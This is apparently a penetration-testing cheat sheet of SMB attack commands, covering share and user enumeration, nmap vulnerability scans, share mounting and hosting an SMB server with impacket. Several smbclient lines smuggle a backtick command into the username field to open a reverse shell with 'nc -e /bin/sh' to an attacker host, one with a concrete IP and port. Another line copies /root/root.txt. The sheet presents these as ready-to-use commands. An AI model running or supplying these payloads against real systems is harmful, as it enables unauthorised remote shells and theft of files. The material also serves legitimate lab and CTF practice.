
SMB Enumeration

smbclient -L x.x.x.x
smbmount //x.x.x.x/share /mnt -o username=hodor,workgroup=hodor
smbclient \\\\x.x.x.x\\share
enum4linux -a ip
rpcclient -U "" x.x.x.x  # Anonymous bind using rpcclient / Null connect
smbclient //MOUNT/share  # Connect to SMB share
smbclient -U "/=\`nohup nc -e /bin/sh LHOST LPORT\`" -N -I ip //LAME/tmp
nmap -T4 -sS -sC -Pn -A --script smb-vuln* ip
smbclient //ip/tmplogon "./=\`nohup nc -e /bin/sh LHOST LPORT\`"
smbclient -U "/=\`nohup cat /root/root.txt > /tmp/ttt\`" -N -I ip //LAME/tmp
smbclient -U "/=\`nohup nc -e /bin/sh 10.10.15.11 60000\`" -N -I ip //LAME/tmp
smbclient -L ip
enum4linux -S ip

Nmap SMB Script Scan

  • SMB Users and Share Scan

    nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse ip
    
  • SMB Vulnerability Scan

    nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse ip
    
  • SMB Vulnerability Check with Unsafe Arguments

    nmap --script smb-check-vulns.nse --script-args=unsafe=1 -p445 ip
    
  • SMB Vulnerability Check

    nmap --script=smb-check-vulns.nse x.x.x.x
    
  • Mounting an NFS share without using locks

    mount -o nolock ip:/vol/share /mnt/nfs
    
  • Mounting a CIFS share with specified credentials and domain

    mount -t cifs -o username=user,password=pass,domain=blah //ip.X/share-name /mnt/cifs
    
  • Mounting a CIFS share without specifying credentials (prompt for password)

    mount -t cifs //x.x.x.x/share /mnt
    
  • Mounting a CIFS share with specified credentials

    mount -t cifs -o username=hodor,password=hodor //x.x.x.x/share /mnt
    
  • Mounting Share folder

    sudo mount -t fuse.vmhgfs-fuse .host:/ /mnt/hgfs -o allow_other
    

Create an SMB Server

  • On Kali, host an SMB server
    impacket-smbserver ShareFolder $(pwd)
    
  • On Windows
    New-PSDrive -Name "Followme" -PSProvider "FileSystem" -Root "\\ip\ShareFolder"